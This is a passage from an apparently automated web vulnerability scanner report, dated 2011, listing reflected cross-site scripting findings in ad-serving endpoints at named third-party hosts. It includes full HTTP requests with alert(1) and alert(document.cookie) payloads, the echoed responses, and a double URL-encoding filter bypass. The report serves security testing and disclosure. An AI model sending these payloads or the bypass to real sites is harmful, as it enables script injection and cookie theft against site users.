Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe!t=639!?che=7735200&clk1=c48dd"%3balert(1)//51cb3eab07a HTTP/1.1
Host: ad.aggregateknowledge.com
Proxy-Connection: keep-alive
Referer: http://www.aisledash.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=65385214552746607; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Fri, 05-Feb-2016 20:24:01 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0BAJZGIgAAAAAAAEAhgEAngEDPwEQAAEAhn53%2FItTDiD8ogAAAAAAAAHiAAAAAAAAAz8AAAAAAAAAngAdAAA%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Tue, 05-Feb-2013 20:24:01 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 20:24:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href=\"c48dd";alert(1)//51cb3eab07ahttp://ad.aggregateknowledge.com/interaction!che=1886299562?imid=8645938573480098978&ipid=482&caid=134&cgid=158&crid=831&a=CLICK&adid=29&status=0&l=http://www.pantene.com/en-US/news-and-offers/Pages/sa
...[SNIP]...

1.7. http://ad.aggregateknowledge.com/iframe!t=639! [clk1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.aggregateknowledge.com
Path:   /iframe!t=639!

Issue detail

The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb519"><script>alert(1)</script>9f3b6c26b66 was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=639!?che=7735200&clk1=cb519"><script>alert(1)</script>9f3b6c26b66 HTTP/1.1
Host: ad.aggregateknowledge.com
Proxy-Connection: keep-alive
Referer: http://www.aisledash.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=289089061502008663; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Fri, 05-Feb-2016 20:24:01 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0BAJZGIgAAAAAAAEAhgEAngEDWQEQAAEAhn4H0B%2BXD6%2FnigAAAAAAAAHiAAAAAAAAA1kAAAAAAAAAngAdAAA%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Tue, 05-Feb-2013 20:24:01 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 20:24:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="cb519"><script>alert(1)</script>9f3b6c26b66http://ad.aggregateknowledge.com/interaction!che=2014193925?imid=562984687085021066&ipid=482&caid=134&cgid=158&crid=857&a=CLICK&adid=29&status=0&l=http://www.pantene.com/en-US/news-and-offers/Pages/sat
...[SNIP]...

1.8. http://ad.doubleclick.net/adj/brokerbutton.smartmoney.com/article_tools [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/brokerbutton.smartmoney.com/article_tools

Issue detail

The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe590'%3balert(1)//d0f1bb128f1 was submitted in the kw parameter. This input was echoed as fe590';alert(1)//d0f1bb128f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/brokerbutton.smartmoney.com/article_tools;kw=fe590'%3balert(1)//d0f1bb128f1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 380
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:59:12 GMT
Expires: Sun, 06 Feb 2011 20:59:12 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa6/0/0/%2a/k;235708319;0-0;0;47801202;255-0/0;40500764/40518551/1;;~okv=;kw=fe590';alert(1)//d0f1bb128f1;~aopt=2/0/ff/0;~sscs=%3fhttp://ad.doubleclick.net/clk;235364356;59005779;s;pc=[TPAS_ID]">
...[SNIP]...

1.9. http://ad.doubleclick.net/adj/brokerbutton.smartmoney.com/article_tools [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/brokerbutton.smartmoney.com/article_tools

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68712'-alert(1)-'595c492cbdb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/brokerbutton.smartmoney.com/article_tools;kw=ETFs;kw=Investing;columns=;contentid=26488;pos=4;ticker=QAI;ticker=MCRO;ticker=MNA;ticker=ALT;ticker=SPY;pagetemplate=1;level2=etfs;level2=etfs;tile=4;sz=120x30;ord=1557503509?&68712'-alert(1)-'595c492cbdb=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 20:59:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 443

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa6/0/0/%2a/o;44306;0-0;0;47801202;47-120/30;0/0/0;;~okv=;kw=ETFs;kw=Investing;columns=;contentid=26488;pos=4;ticker=QAI;ticker=MCRO;ticker=MNA;ticker=ALT;ticker=SPY;pagetemplate=1;level2=etfs;level2=etfs;tile=4;sz=120x30;;68712'-alert(1)-'595c492cbdb=1;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

1.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1297024518** [10,1,103;1920;1200;http%3A_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c%2522-alertdocument.cookie-%2522c83105876b0%3D1?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1297024518**

Issue detail

The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c%2522-alertdocument.cookie-%2522c83105876b0%3D1?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbf18'-alert(1)-'10c9706c898 was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c%2522-alertdocument.cookie-%2522c83105876b0%3D1?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1297024518**;10,1,103;1920;1200;http%3A_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c%2522-alertdocument.cookie-%2522c83105876b0%3D1?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=fbf18'-alert(1)-'10c9706c898 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297024518:L|19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 06 Feb 2011 20:35:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 09-Mar-2011 20:35:53 GMT; path=/
Set-Cookie: i_1=19:1537:705:23:0:38885:1297024553:L|19:1543:207:0:0:38885:1297024518:L|19:1543:207:0:0:38885:1297021627:L; expires=Tue, 08-Mar-2011 20:35:53 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 928

   function wsod_image() {
       document.write('<a href="http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn
...[SNIP]...
eg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=fbf18'-alert(1)-'10c9706c898http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1537.705.js.234x60/**;10.1103;1920;1200;http:_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c-alertdocument.cookie-c83105876b0=1" target="_blank" tit
...[SNIP]...

1.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1297024518** [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1297024518**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d164'-alert(1)-'c88d9c62617 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1297024518**;10,1,103;1920;1200;http%3A_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c%2522-alertdocument.cookie-%2522c83105876b0%3D1?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=&5d164'-alert(1)-'c88d9c62617=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297024518:L|19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 06 Feb 2011 20:35:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 09-Mar-2011 20:35:58 GMT; path=/
Set-Cookie: i_1=19:1537:706:23:0:38885:1297024558:L|19:1543:207:0:0:38885:1297024518:L|19:1543:207:0:0:38885:1297021627:L; expires=Tue, 08-Mar-2011 20:35:58 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 929

   function wsod_image() {
       document.write('<a href="http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn
...[SNIP]...
g=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=&5d164'-alert(1)-'c88d9c62617=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1537.706.js.234x60/**;10.1103;1920;1200;http:_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c-alertdocument.cookie-c83105876b0=1" target="_blank" t
...[SNIP]...

1.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29654%2522%253balert%25281%2529%252f%252fbaf59fc0de was submitted in the REST URL parameter 2. This input was echoed as 29654";alert(1)//baf59fc0de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135729654%2522%253balert%25281%2529%252f%252fbaf59fc0de/1537.0.js.234x60/24516506?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L|33:353:78:3:0:38655:1296683296:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 06 Feb 2011 20:35:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1917

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a63135729654";alert(1)//baf59fc0de/1537.0.js.234x60/1297024559**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e10784
...[SNIP]...

1.13. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1db4%2522%253balert%25281%2529%252f%252f81b157f6309 was submitted in the REST URL parameter 3. This input was echoed as d1db4";alert(1)//81b157f6309 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60d1db4%2522%253balert%25281%2529%252f%252f81b157f6309/24516506?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L|33:353:78:3:0:38655:1296683296:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 06 Feb 2011 20:36:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1918

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60d1db4";alert(1)//81b157f6309/1297024561**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f
...[SNIP]...

1.14. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcde6"-alert(1)-"469bc60813b was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=dcde6"-alert(1)-"469bc60813b HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L|33:353:78:3:0:38655:1296683296:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 06 Feb 2011 20:35:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1918

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
eg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=dcde6"-alert(1)-"469bc60813b">
...[SNIP]...

1.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ece2"-alert(1)-"d2c7ce0c658 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=&3ece2"-alert(1)-"d2c7ce0c658=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L|33:353:78:3:0:38655:1296683296:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 06 Feb 2011 20:35:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1921

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
